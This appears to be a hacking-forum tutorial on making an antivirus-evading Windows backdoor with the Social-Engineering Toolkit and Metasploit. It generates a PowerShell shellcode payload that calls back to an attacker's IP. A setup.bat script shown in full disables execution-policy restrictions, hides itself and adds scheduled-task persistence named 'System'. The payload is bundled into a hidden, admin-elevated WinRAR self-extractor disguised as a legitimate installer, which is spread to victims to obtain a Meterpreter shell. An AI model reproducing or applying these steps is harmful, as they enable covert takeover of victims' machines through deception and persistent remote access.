How To Create Backdoor With Set And Metasploit to hack remote pc


Today I would talk about how to create a backdoor completely undetectable(This is and will remain) by antivirus a very simple way and totally free(no crypter).
Then i show you how to implement this with a lambda file.


S.E.T(Social-Engineering Toolkit)
Winrar (On a windows machine)
Armitage((Optional) Website)

First Step : Use S.E.T for create a powershell backdoor

Open S.E.T and select the first option
[Image: 78752121.png]

Then Select the powershell option 10
[Image: 21143359.png]

And then the first option alphanumeric shellcode injector
[Image: 38282003.png]

Add the IP address
[Image: 36893204.png]

And the port
[Image: 66061652.png]

Don't start the listener now
[Image: 40973801.png]

Go to the given path
[Image: 16987126.png]
[Image: 21408385.png]

Second Step: Create the backdoor

Edit the two files and add "@echo off" on the top of each one.

Rename each one ps86.bat and ps64.bat and copy them on a windows machine with winrar installed.

Create another bat file named setup.bat with this code inside :
@echo off
powershell Set-ExecutionPolicy Unrestricted
cd %userprofile%
attrib +H setup.bat
schtasks /create /F /SC DAILY /TN "System" /TR "%userprofile%\ps86.bat" /ST 10:00
schtasks /create /F /SC DAILY /TN "System1" /TR "%userprofile%\ps64.bat" /ST 10:00
start ps86.bat
start ps64.bat
start old.exe

Get a legit executable setup file, rename it at old.exe and add the 3 bat file on an archive.
[Image: 67431777.png]

Select create an SFX archive and click on advanced tab and Click on SFX Options

Path to extract : %userprofile%
Select setup tab and type setup.bat at run after extraction
Select mode tab and select Hide all
Select advanced tab and select request administrative access
[Image: 22636084.png]

Select Update tab and on overwrite mode select overwrite all file
Select Text and Icon and add an icon
[Image: 16913783.png]

Click ok twice and wait for the archive creation

Third Step: Spread and Get a Meterpreter

Open a listener on Armitage
[Image: 16545830.png]
[Image: 92487437.png]

Wait for the payload execution
[Image: 75789805.png]

Get Your Meterpreter
[Image: 15833571.png]

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